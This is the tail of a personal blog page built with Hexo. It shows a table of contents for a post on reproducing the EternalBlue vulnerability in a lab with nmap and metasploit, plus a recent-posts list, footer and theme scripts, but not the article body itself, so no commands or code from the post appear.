class="toc-number">1.3.1.2.2.</span> <span class="toc-text">攻击机</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.2.</span> <span class="toc-text">攻击过程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E9%9D%B6%E6%9C%BAIP%E5%9C%B0%E5%9D%80"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">查询靶机IP地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8nmap"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">使用nmap</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8metasploit"><span class="toc-number">1.3.2.3.</span> <span class="toc-text">使用metasploit</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BC%80%E5%90%AF%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2"><span class="toc-number">1.3.2.4.</span> <span class="toc-text">开启远程桌面</span></a></li></ol></li></ol></li></ol></li></ol>
</div>
            </main>
            <aside class="right-column">
              <div class="sticky-widescreen">
  
  
    <article class="card card-content toc-card">
      <div class="toc-header">
  <i 
    class="iconfont icon-menu" 
    style="padding-right: 2px;">
  </i>目录
</div>
<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">永恒之蓝漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EternalBlue"><span class="toc-number">1.2.1.</span> <span class="toc-text">EternalBlue</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">1.2.2.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#metasploit"><span class="toc-number">1.2.3.</span> <span class="toc-text">metasploit</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.</span> <span class="toc-text">复现过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E7%8E%AF%E5%A2%83"><span class="toc-number">1.3.1.</span> <span class="toc-text">搭建环境</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">配置过程</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA"><span class="toc-number">1.3.1.2.1.</span> <span class="toc-text">靶机</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%9C%BA"><span class="toc-number">1.3.1.2.2.</span> <span class="toc-text">攻击机</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.2.</span> <span class="toc-text">攻击过程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E9%9D%B6%E6%9C%BAIP%E5%9C%B0%E5%9D%80"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">查询靶机IP地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8nmap"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">使用nmap</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8metasploit"><span class="toc-number">1.3.2.3.</span> <span class="toc-text">使用metasploit</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BC%80%E5%90%AF%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2"><span class="toc-number">1.3.2.4.</span> <span class="toc-text">开启远程桌面</span></a></li></ol></li></ol></li></ol></li></ol>
    </article>
  
  
  <article class="card card-content">
    <div class="recent-posts-card">
  <div class="recent-posts-header">
    <i 
      class="iconfont icon-wenzhang_huaban" 
      style="padding-right: 2px;">
    </i>最近文章
  </div>
  <div class="recent-posts-list">
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2022-07-09</div>
        <a href="/p/5948019b.html"><div class="recent-posts-item-content">如何让自己看上去、闻上去都像一个 CS 人</div></a>
      </div>
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2022-06-23</div>
        <a href="/p/948c859b.html"><div class="recent-posts-item-content">大一春夏学期回顾</div></a>
      </div>
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2022-05-14</div>
        <a href="/p/fdea9fc4.html"><div class="recent-posts-item-content">永恒之蓝漏洞复现</div></a>
      </div>
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2022-05-01</div>
        <a href="/p/76042cd9.html"><div class="recent-posts-item-content">CS61A 感想&amp;建议</div></a>
      </div>
    
  </div>
</div>
  </article>
  
  
</div>
            </aside>
          </div>
        </div>
      </div>
    </div>
     
    <footer class="footer">
  <div class="footer-container">
    <div>
      <div class="footer-dsc">
        <span>
          Copyright ©
          
            2022
          
          
        </span>
        &nbsp;
        <a 
          href="/" 
          class="footer-link">
          HobbitQia's Blog
        </a>
      </div>
    </div>

    
      <div class="footer-dsc">
        
          Powered by
          <a 
            href="https://hexo.io/" 
            class="footer-link" 
            target="_blank" 
            rel="nofollow noopener noreferrer">
            &nbsp;Hexo
          </a>
        
        
          <span>&nbsp;|&nbsp;</span>
        
        
          Theme -
          <a 
            href="https://github.com/theme-kaze" 
            class="footer-link" 
            target="_blank"
            rel="nofollow noopener noreferrer">
            &nbsp;Kaze
          </a>
        
      </div>
    
    
    
      <div class="BbeiAn-info">
        <a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/">渝ICP备2022007742号-1 </a>
      </div>
      
    
    
      <div class="footer-dsc">
        
          本站总访问量<span id="busuanzi_value_site_pv"></span>次
        
        
          <span>&nbsp;|&nbsp;</span>
        
        
          本站总访客数<span id="busuanzi_value_site_uv"></span>次
        
      </div>
      
    
</footer>
 
    
  <a 
    role="button" 
    id="scrollbutton" 
    class="basebutton" 
    aria-label="回到顶部">
    <i class="iconfont icon-arrowleft button-icon"></i>
  </a>

<a 
  role="button" 
  id="menubutton"
  aria-label="menu button"
  class="basebutton">
  <i class="iconfont icon-menu button-icon"></i>
</a>
<a 
  role="button" 
  id="popbutton" 
  class="basebutton" 
  aria-label="控制中心">
  <i class="iconfont icon-expand button-icon"></i>
</a>
<a 
  role="button" 
  id="darkbutton" 
  class="basebutton darkwidget" 
  aria-label="夜色模式">
  <i class="iconfont icon-weather button-icon"></i>
</a>
<a 
  role="button" 
  id="searchbutton" 
  class="basebutton searchwidget" 
  aria-label="搜索">
  <i class="iconfont icon-search button-icon"></i>
</a> 
     
     
      
 
     
     
      <script>
  var addImgLayout = function () {
    var img = document.querySelectorAll('.post-content img')
    var i
    for (i = 0; i < img.length; i++) {
      var wrapper = document.createElement('a')
      wrapper.setAttribute('href', img[i].getAttribute('data-src'))
      wrapper.setAttribute('aria-label', 'illustration')
      wrapper.style.cssText =
        'width: 100%; display: flex; justify-content: center;'
      if (img[i].alt) wrapper.dataset.caption = img[i].alt
      wrapper.dataset.nolink = true
      img[i].before(wrapper)
      wrapper.append(img[i])
      var divWrap = document.createElement('div')
      divWrap.classList.add('gallery')
      wrapper.before(divWrap)
      divWrap.append(wrapper)
    }
    baguetteBox.run('.gallery')
  }
</script>
<script>
  loadScript(
    "/js/lib/lightbox/baguetteBox.min.js",
    addImgLayout
  )
</script>
 
     
     
    <script src="/js/main.js"></script> 
    
      <script> 
        loadScript('/js/lib/busuanzi.min.js') 
      </script>
     
    
      <script>
        var addLazyload = function () {
          var observer = lozad('.lozad', {
            load: function (el) {
              el.srcset = el.getAttribute('data-src')
            },
            loaded: function (el) {
              el.classList.add('loaded')
            },
          })
          observer.observe()
        }
      </script>
      <script>
        loadScript('/js/lib/lozad.min.js', addLazyload)
      </script>
    
    <script src="//instant.page/5.1.0" type="module"
      integrity="sha384-by67kQnR+pyfy8yWP4kPO12fHKRLHZPfEsiSXR8u2IKcTdxD805MGUXBzVPnkLHw"></script>
    
    
      <script>
        setTimeout(() => {localSearch("search.json")}, 0)
      </script>
    
  </body>
</html>
